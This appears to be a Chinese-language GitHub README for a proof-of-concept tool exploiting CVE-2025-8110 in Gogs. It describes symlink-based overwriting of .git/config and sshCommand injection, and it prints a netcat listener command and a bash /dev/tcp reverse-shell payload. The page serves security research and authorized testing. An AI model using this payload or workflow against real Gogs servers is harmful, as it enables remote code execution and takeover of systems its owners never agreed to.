Ghxstsec/CVE-2025-8110

GitHub: Ghxstsec/CVE-2025-8110

针对 Gogs 的 CVE-2025-8110 漏洞利用工具,实现通过符号链接与 sshCommand 注入触发远程代码执行。

Stars: 1 | Forks: 2

# Gogs RCE 漏洞利用 (CVE-2025-8110) ![Python](https://img.shields.io/badge/Python-3.12+-blue.svg) ![License](https://img.shields.io/badge/License-MIT-green.svg) ![Expertise](https://img.shields.io/badge/Area-Cybersecurity-red.svg) **CVE-2025-8110** 的概念验证(PoC),一种 Gogs 中的关键漏洞,允许通过操纵 `.git/config` 文件(使用符号链接绕过和 `sshCommand` 注入)实现远程代码执行(RCE)。 ## 📖 概述 此漏洞利用 Gogs API 内容管理中的路径遍历缺陷。认证用户可以: 1. 创建一个仓库并推送指向内部 `.git/config` 的**符号链接**。 2. 使用 API 通过符号链接覆盖目标配置文件。 3. 注入恶意的 `sshCommand`,在服务器执行 Git 操作时触发**反向 Shell**。 ## 🚀 功能特性 - **自动化流程**:处理登录、仓库创建、符号链接部署和注入。 - **健壮的编码**:自动对凭证进行 URL 编码,以处理特殊字符(例如 `!`、`@`)。 - **丰富的输出**:使用 `Rich` 库实现高可见性日志记录。 ## 🛠️ 先决条件 - **Python 3.12+** - 系统中安装 **Git**。 - 目标 Gogs 实例的有效凭证。 ## 📦 安装 1. 克隆仓库: git clone https://github.com/Ghxstsec/CVE-2025-8110.git cd CVE-2025-8110 安装依赖项: ``` pip3 install -r requirements.txt ``` 💻 使用方法 启动监听器: ``` nc -lvnp 6666 ``` 运行漏洞利用: ``` python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh -lp 6666 -p 'YourPassword123!' ``` 参数说明: | 参数 | 描述 | |---|---| | `-u, --url` | 目标 Gogs 实例的基准 URL(例如 `http://target.htb:3000`)。 | | `-lh, --host` | 攻击者 IP(LHOST),反向 Shell 将连接至此。 | | `-lp, --port` | 监听端口(LPORT),在本机配置的端口。 | | `-p, --password` | 用于认证的 `pwnuser` 账户密码。 | | `-x, --proxy` | (可选)通过本地代理路由流量(默认:`http://localhost:8080`)。 | #### 漏洞核心: sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' # 当 Gogs 执行需要网络传输的 Git 命令(例如镜像同步或内部引用检查)时,会调用 `sshCommand`,从而触发反向 Shell。 ### ⚠️ 法律声明:此工具仅供教育和授权安全测试使用。作者不对任何误用或由此脚本造成的损害负责。未经授权访问计算机系统是非法的。
标签:API安全, CVE-2025-8110, DNS 解析, Git, Gogs, Go语言工具, HTTP工具, IP 地址批量处理, JSON输出, PoC, Python, RCE, Rich库, SSH命令注入, URL编码, 反向Shell, 无后门, 暴力破解, 权限绕过, 符号链接绕过, 编程工具, 网络安全, 网络安全研究, 网络调试, 自动化, 路径遍历, 远程代码执行, 逆向工具, 隐私保护